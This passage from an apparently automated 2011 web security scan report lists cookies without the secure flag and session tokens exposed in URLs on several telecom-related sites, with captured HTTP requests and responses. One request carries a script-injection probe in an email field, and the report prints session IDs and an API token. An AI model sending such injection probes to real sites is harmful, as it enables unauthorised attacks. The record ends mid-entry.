https://support.connexon.com/custom/customimages/911_logo_trc.jpg.gif
https://support.connexon.com/custom/customimages/Custom_HeadLogo.gif
https://support.connexon.com/custom/customimages/portal-browse-solutions.gif
https://support.connexon.com/custom/customimages/portal-browse-ticket.gif
https://support.connexon.com/images/favicon.ico
https://support.connexon.com/images/spacer.gif
https://support.connexon.com/sd/SolutionsHome.sd
https://support.connexon.com/style/demo.css
https://support.connexon.com/style/style.css
https://lnp.activationnow.com/favicon.ico
https://lnp.activationnow.com/lnp/jsp/logon/login.jsp
https://www.nationalnanpa.com/nas/security/user_reg_mail.do
https://www.nationalnanpa.com/nas/security/user_reg_pre_mail.do

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

8.1. https://catalyst.fastcatalog.net/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://catalyst.fastcatalog.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=AD971C52BCD76B2912D285BABD89388E; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: catalyst.fastcatalog.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.catalysttelecom.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AD971C52BCD76B2912D285BABD89388E; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:11:13 GMT
Connection: Keep-Alive
Content-Length: 6220



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type"
...[SNIP]...

8.2. https://lnp.activationnow.com/lnp/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://lnp.activationnow.com
Path:	/lnp/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395; path=/
LNP=pabetaptel16p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lnp/ HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: LNP=pabetaptel16p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Cache-Control: no-cache="set-cookie"
Date: Thu, 12 May 2011 00:50:19 GMT
Location: https://lnp.activationnow.com/lnp/jsp/logon/login.jsp;jsessionid=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395
Set-Cookie: JSESSIONID=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 457

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://lnp.activationnow.com/lnp/j
...[SNIP]...

8.3. https://support.connexon.com/custom/customimages/911_logo_trc.jpg.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/custom/customimages/911_logo_trc.jpg.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=E67566A9FCA34838BD3C0F39C7667AF5; Path=/custom
PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/911_logo_trc.jpg.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=E67566A9FCA34838BD3C0F39C7667AF5; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"23480-1288968421251"
Last-Modified: Fri, 05 Nov 2010 14:47:01 GMT
Content-Type: image/gif
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 23480

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

8.4. https://support.connexon.com/custom/customimages/Custom_HeadLogo.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/custom/customimages/Custom_HeadLogo.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=278E65F15DE692F4A8E073513FF95433; Path=/custom
PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/Custom_HeadLogo.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=278E65F15DE692F4A8E073513FF95433; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"4671-1288970193688"
Last-Modified: Fri, 05 Nov 2010 15:16:33 GMT
Content-Type: image/gif
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 4671

.PNG
.
...IHDR..............h.s... pHYs..........+....
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*! .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

8.5. https://support.connexon.com/custom/customimages/portal-browse-solutions.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/custom/customimages/portal-browse-solutions.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=8B4C97B2401F7908250BAE174F9BBA38; Path=/custom
PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/portal-browse-solutions.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=8B4C97B2401F7908250BAE174F9BBA38; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"1990-1280994282000"
Last-Modified: Thu, 05 Aug 2010 07:44:42 GMT
Content-Type: image/gif
Content-Length: 1990
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1

GIF89a0.0....J..3i.w..,}.*j."[{......$VxN...Lky..c.....\..Z..*y....=r....V..2..i..Y..o..5........f..,..&i.......7..l..Q..3..:........$a.S..S........{..g..5..m........[..{........`.....9..4..e..*.."TsA
...[SNIP]...

8.6. https://support.connexon.com/custom/customimages/portal-browse-ticket.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/custom/customimages/portal-browse-ticket.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=AD61B4917C0B442AD2D923ADADC2675A; Path=/custom
PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/portal-browse-ticket.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=AD61B4917C0B442AD2D923ADADC2675A; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"2226-1280994282000"
Last-Modified: Thu, 05 Aug 2010 07:44:42 GMT
Content-Type: image/gif
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 2226

GIF89a0.0....w..m...........!4m...........W....y....6....w...........e..]M...f.F..BEu.........J.k...v.......T.........B...........jw............m.....e...........I........|8?r...8..`.t........Y.......
...[SNIP]...

8.7. https://support.connexon.com/images/favicon.ico previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/images/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=607787AE9CA83B1C07389AEFC2EF256A; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/favicon.ico HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=607787AE9CA83B1C07389AEFC2EF256A; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:13 GMT; Path=/
ETag: W/"318-1282158794000"
Last-Modified: Wed, 18 Aug 2010 19:13:14 GMT
Content-Length: 318
Date: Thu, 12 May 2011 01:08:12 GMT
Server: Apache-Coyote/1.1

..............(.......(....... .................................................................................................................wwpwww....|.....................ww|.......|.............
...[SNIP]...

8.8. https://support.connexon.com/images/spacer.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=3E33D7090110A52AF1A2EDAFA1C24EAD; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/spacer.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=3E33D7090110A52AF1A2EDAFA1C24EAD; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:10 GMT; Path=/
Expires: Mon, 16 May 2011 05:08:10 GMT
ETag: W/"43-1282158794000"
Last-Modified: Wed, 18 Aug 2010 19:13:14 GMT
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 01:08:10 GMT
Server: Apache-Coyote/1.1

GIF89a.............!.......,...........D..;

8.9. https://support.connexon.com/sd/SolutionsHome.sd previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/sd/SolutionsHome.sd

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=270247465902DF59F63589A1CC79528E; Path=/sd

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sd/SolutionsHome.sd HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.911enable.com/login/index.php

Response

8.10. https://support.connexon.com/style/demo.css previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/style/demo.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=CF1B4E8028A2944A1E644EE9D78DB960; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/demo.css HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 404 /style/demo.css
Set-Cookie: JSESSIONID=CF1B4E8028A2944A1E644EE9D78DB960; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
Expires: Mon, 16 May 2011 05:08:09 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 997
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1

<html><head><title>Apache Tomcat/5.0.28 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

8.11. https://support.connexon.com/style/style.css previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/style/style.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=AF295E2F29DA2AF72D8D0F33050CAE08; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/style.css?aa HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=AF295E2F29DA2AF72D8D0F33050CAE08; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:12 GMT; Path=/
Expires: Mon, 16 May 2011 05:08:12 GMT
ETag: W/"320710-1282158796000"
Last-Modified: Wed, 18 Aug 2010 19:13:16 GMT
Content-Type: text/css
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:11 GMT
Server: Apache-Coyote/1.1
Content-Length: 320710

/* $Id: style.css,v 1.287 2010/06/11 07:36:28 vijay Exp $ */
@import url("htmlarea.css");
@import url("combo.css");
@import url("common.css");
@import url("menu.css");
@import url("cal_style.css");
...[SNIP]...

8.12. https://lnp.activationnow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://lnp.activationnow.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413; LNP=pabetaptel15p-lnp

Response

HTTP/1.1 404 Not Found
Set-Cookie: LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Connection: close
Date: Thu, 12 May 2011 00:50:21 GMT
Content-Length: 1214
Content-Type: text/html
X-Powered-By: Servlet/2.4 JSP/2.0

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

8.13. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://lnp.activationnow.com
Path:	/lnp/jsp/logon/login.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lnp/jsp/logon/login.jsp;jsessionid=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413 HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LNP=pabetaptel15p-lnp; JSESSIONID=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413

Response

8.14. https://www.nationalnanpa.com/nas/security/user_reg_mail.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.nationalnanpa.com
Path:	/nas/security/user_reg_mail.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

nanpaid=nqw6NLkhZBxKqvZ56hWlB5TyT0nTqDm8nJLB7XMLvr2plsh2B2xK!-242160596; path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/security/user_reg_mail.do?method=createNewMode HTTP/1.1
Host: www.nationalnanpa.com
Connection: keep-alive
Referer: http://nanpa.com/contact_us/mailing_list.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:05:46 GMT
Server: Apache
Set-Cookie: nanpaid=nqw6NLkhZBxKqvZ56hWlB5TyT0nTqDm8nJLB7XMLvr2plsh2B2xK!-242160596; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 13206

<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...

8.15. https://www.nationalnanpa.com/nas/security/user_reg_pre_mail.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.nationalnanpa.com
Path:	/nas/security/user_reg_pre_mail.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

nanpaid=Ff09NLvHkTLnGvzy5qzXJQgg3zKQYMGpNzkq02Jv0DG1QM3cfYwz!1521367000; path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/security/user_reg_pre_mail.do;nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596?method=subscribeMailUser&nnsStateListHidden=AK&userStageModel.emailAddr=24c54%3Cscript%3Ealert(%22DORK%22)%3C/script%3E508ccbd11b05bf3ba HTTP/1.1
Host: www.nationalnanpa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://burp/show/5

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:52:55 GMT
Server: Apache
Set-Cookie: nanpaid=Ff09NLvHkTLnGvzy5qzXJQgg3zKQYMGpNzkq02Jv0DG1QM3cfYwz!1521367000; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 5270

<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...

9. Session token in URL previous next
There are 12 instances of this issue:

http://api.demandbase.com/api/v2/ip.json
http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
http://images.smartname.com/scripts/google_afd_v2.js
http://l.sharethis.com/pview
https://lnp.activationnow.com/lnp/
https://lnp.activationnow.com/lnp/jsp/logon/login.jsp
http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate
http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

9.1. http://api.demandbase.com/api/v2/ip.json previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://api.demandbase.com
Path:	/api/v2/ip.json

Issue detail

The URL in the request appears to contain a session token within the query string:

http://api.demandbase.com/api/v2/ip.json?token=b155ec5d50b5dcb41662f36b4d10a6f7702c87e6%20&callback=dbase_parse

Request

GET /api/v2/ip.json?token=b155ec5d50b5dcb41662f36b4d10a6f7702c87e6%20&callback=dbase_parse HTTP/1.1
Host: api.demandbase.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Api-Version: v2
Content-Type: application/javascript;charset=utf-8
Date: Thu, 12 May 2011 00:46:48 GMT
Server: Apache
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Connection: keep-alive
Content-Length: 699

dbase_parse({"city":"Birmingham","zip":"35210","latitude":33.537200927734,"company_name":"Media Visions","demandbase_sid":11633220,"company_size":"$5M - $10M","primary_sic":5065,"registry_city":"Dalla
...[SNIP]...

9.2. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://connectedplanetonline.com
Path:	/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v2/ip.json?token=b155ec5d50b5dcb41662f36b4d10a6f7702c87e6 &callback=dbase_parse

Request

Response

9.3. http://images.smartname.com/scripts/google_afd_v2.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://images.smartname.com
Path:	/scripts/google_afd_v2.js

Issue detail

The response contains the following links that appear to contain session tokens:

http://images.smartname.com/?domain_name=' + google_afd_response.request.s +
'&q=' + encodeURIComponent(google_categories[i].term) +
'&token=' + google_categories[i].token + '

Request

GET /scripts/google_afd_v2.js HTTP/1.1
Host: images.smartname.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
